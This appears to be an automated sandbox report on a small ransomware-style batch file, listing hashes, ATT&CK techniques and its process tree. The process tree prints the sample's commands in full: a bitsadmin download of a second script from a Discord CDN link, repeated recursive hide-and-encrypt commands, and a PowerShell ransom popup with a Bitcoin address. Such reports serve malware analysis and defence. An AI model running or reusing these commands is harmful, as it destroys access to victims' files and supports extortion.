b3f3062ab048e56004c9d0d358ff7ff5ea01649d565ee51af67bb73b299c7d07

Analysis

max time kernel
128s
max time network
135s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
06/10/2023, 08:42

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

rivero.bat
Size

382B
MD5

db36f940925188547dbeff99f3f10f07
SHA1

007e8dd4f2b0a014a338bbb71406d9c9541a8d17
SHA256

b3f3062ab048e56004c9d0d358ff7ff5ea01649d565ee51af67bb73b299c7d07
SHA512

cd2c23a029249dda6a986094615ce1e0d5d1066d26453e93cd081cdd46a6d330ef972ec6923ee47a0c4109fb12f930775cd14095ac52c2d6ba5fc6411e42017d

Score

1^/10

Malware Config

Signatures

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
704	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
824	bitsadmin.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
628	tasklist.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	628	tasklist.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 4108 wrote to memory of 824	4108	cmd.exe	71
PID 4108 wrote to memory of 824	4108	cmd.exe	71
PID 4108 wrote to memory of 744	4108	cmd.exe	74
PID 4108 wrote to memory of 744	4108	cmd.exe	74
PID 744 wrote to memory of 2920	744	cmd.exe	76
PID 744 wrote to memory of 2920	744	cmd.exe	76
PID 744 wrote to memory of 2480	744	cmd.exe	77
PID 744 wrote to memory of 2480	744	cmd.exe	77
PID 744 wrote to memory of 4660	744	cmd.exe	78
PID 744 wrote to memory of 4660	744	cmd.exe	78
PID 744 wrote to memory of 3284	744	cmd.exe	79
PID 744 wrote to memory of 3284	744	cmd.exe	79
PID 744 wrote to memory of 4176	744	cmd.exe	80
PID 744 wrote to memory of 4176	744	cmd.exe	80
PID 744 wrote to memory of 4536	744	cmd.exe	81
PID 744 wrote to memory of 4536	744	cmd.exe	81
PID 744 wrote to memory of 4164	744	cmd.exe	82
PID 744 wrote to memory of 4164	744	cmd.exe	82
PID 744 wrote to memory of 2872	744	cmd.exe	83
PID 744 wrote to memory of 2872	744	cmd.exe	83
PID 744 wrote to memory of 4632	744	cmd.exe	84
PID 744 wrote to memory of 4632	744	cmd.exe	84
PID 744 wrote to memory of 5088	744	cmd.exe	85
PID 744 wrote to memory of 5088	744	cmd.exe	85
PID 744 wrote to memory of 4640	744	cmd.exe	86
PID 744 wrote to memory of 4640	744	cmd.exe	86
PID 744 wrote to memory of 1064	744	cmd.exe	87
PID 744 wrote to memory of 1064	744	cmd.exe	87
PID 744 wrote to memory of 4184	744	cmd.exe	89
PID 744 wrote to memory of 4184	744	cmd.exe	89
PID 744 wrote to memory of 704	744	cmd.exe	90
PID 744 wrote to memory of 704	744	cmd.exe	90
PID 744 wrote to memory of 628	744	cmd.exe	91
PID 744 wrote to memory of 628	744	cmd.exe	91
PID 744 wrote to memory of 5048	744	cmd.exe	92
PID 744 wrote to memory of 5048	744	cmd.exe	92
PID 744 wrote to memory of 4820	744	cmd.exe	94
PID 744 wrote to memory of 4820	744	cmd.exe	94

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2920	attrib.exe
4660	attrib.exe
4176	attrib.exe
4164	attrib.exe
4632	attrib.exe
4640	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rivero.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4108
- C:\Windows\system32\bitsadmin.exe
  bitsadmin /transfer "DownloadJob" "https://cdn.discordapp.com/attachments/1026368512589037568/1159772129319997522/riverro.bat?ex=65323cf7&is=651fc7f7&hm=971fd81bfba162bfd9b77a73bb2a0abbdf283a4a8237b9583ae178c2a2bc85bf&" "C:\Users\Admin\AppData\Local\Temp\river.bat"
  2⤵
  - Download via BitsAdmin
  PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\river.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:744
- - C:\Windows\system32\attrib.exe
    attrib +h /s /d
    3⤵
    - Views/modifies file attributes
    PID:2920
- - C:\Windows\system32\cipher.exe
    cipher /e /s /a
    3⤵
    PID:2480
- - C:\Windows\system32\attrib.exe
    attrib +h /s /d
    3⤵
    - Views/modifies file attributes
    PID:4660
- - C:\Windows\system32\cipher.exe
    cipher /e /s /a
    3⤵
    PID:3284
- - C:\Windows\system32\attrib.exe
    attrib +h /s /d
    3⤵
    - Views/modifies file attributes
    PID:4176
- - C:\Windows\system32\cipher.exe
    cipher /e /s /a
    3⤵
    PID:4536
- - C:\Windows\system32\attrib.exe
    attrib +h /s /d
    3⤵
    - Views/modifies file attributes
    PID:4164
- - C:\Windows\system32\cipher.exe
    cipher /e /s /a
    3⤵
    PID:2872
- - C:\Windows\system32\attrib.exe
    attrib +h /s /d
    3⤵
    - Views/modifies file attributes
    PID:4632
- - C:\Windows\system32\cipher.exe
    cipher /e /s /a
    3⤵
    PID:5088
- - C:\Windows\system32\attrib.exe
    attrib +h /s /d
    3⤵
    - Views/modifies file attributes
    PID:4640
- - C:\Windows\system32\cipher.exe
    cipher /e /s /a
    3⤵
    PID:1064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "$wshell = New-Object -ComObject WScript.Shell; $wshell.Popup('Your files have been encrypted! To get them back, pay $300 to the following Bitcoin address: 3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr', 0, 'ENCRYPTED', 16)"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4184
- - C:\Windows\system32\timeout.exe
    timeout /t 3
    3⤵
    - Delays execution with timeout.exe
    PID:704
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:628
- - C:\Windows\system32\find.exe
    find /i "Ransomware"
    3⤵
    PID:5048
- - C:\Windows\system32\notepad.exe
    notepad "C:\Users\Admin\Downloads\do not close.txt"
    3⤵
    PID:4820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Process Discovery

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0la4us1d.dss.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\do not close.txt

Filesize
132B

MD5
460791485d870c39dc5273ea2ddfc119

SHA1
a247fb46e29831ebea2c4984061a1c80ed67295f

SHA256
257ea28c54cdb0fea4cb56dd97067978cde53585872fe22eb6f152d20bff1251

SHA512
e64ef367731ba22232fb1112aeafc0f2098a05321098f481d45e6e10b74ff645ed644c8c511e5cfafcf16e0da9c91c2641ed5aa8f6fbb36a43445d013f0e3e52

Download Submit
memory/4184-7-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmp

Filesize
9.9MB

Download
memory/4184-8-0x0000022C12790000-0x0000022C127A0000-memory.dmp

Filesize
64KB

Download
memory/4184-6-0x0000022C2A9B0000-0x0000022C2A9D2000-memory.dmp

Filesize
136KB

Download
memory/4184-9-0x0000022C12790000-0x0000022C127A0000-memory.dmp

Filesize
64KB

Download
memory/4184-12-0x0000022C2AB60000-0x0000022C2ABD6000-memory.dmp

Filesize
472KB

Download
memory/4184-27-0x0000022C12790000-0x0000022C127A0000-memory.dmp

Filesize
64KB

Download
memory/4184-31-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmp

Filesize
9.9MB

Download